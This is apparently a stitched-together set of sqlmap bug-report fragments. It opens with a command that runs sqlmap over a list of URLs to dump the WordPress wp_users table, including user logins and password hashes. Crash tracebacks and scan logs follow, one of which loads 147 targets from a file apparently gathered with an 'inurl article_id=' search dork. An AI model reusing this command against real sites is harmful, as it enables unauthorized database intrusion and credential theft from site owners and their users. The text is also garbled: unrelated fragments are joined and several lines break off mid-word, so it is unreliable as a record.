The command line I used was sqlmap.py -m test-urls.txt -Twp_users
-Cid,user_login,user_pass --dump --stop 1 --answer="crack=N" -p id
--technique=B --null-connection --batch > test-urls-output.txt
When processing a list of urls from a file, sqlmap retrieves the
database name from the first url and
[02:27:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev-a371f18,
retry your run with the latest development version from the G
itHub repository. If the exception persists, please send by e-mail to
'sqlmap-users@lists.sourceforge.net' or open a new issue at
'https://github.com/sqlmapproject/sqlm
Traceback (most recent call last):
File "D:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
start()
File "D:\Soft\sqlmap-dev\lib\controller\controller.py", line 355, in
start
checkNullConnection()
File "D:\Soft\sqlmap-dev\lib\controller\checks.py", line 960, in
checkNullConnectio
[*] starting at 14:00:21
[14:00:22] [INFO] testing connection to the target url
[14:00:23] [INFO] testing if the url is stable, wait a few seconds
[14:00:24] [INFO] url is stable
[14:00:24] [INFO] testing if GET parameter 'block' is dynamic
[14:00:25] [INFO] confirming that GET parameter 'block' i
[*] starting at 00:47:56
[00:47:56] [INFO] parsing multiple targets list from
'D:/Soft/sqlmap-dev/inurl article_id=_FILTERED_U.txt'
[00:47:56] [INFO] sqlmap got a total of 147 targets
[00:47:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5243140, retry
your run with the latest development v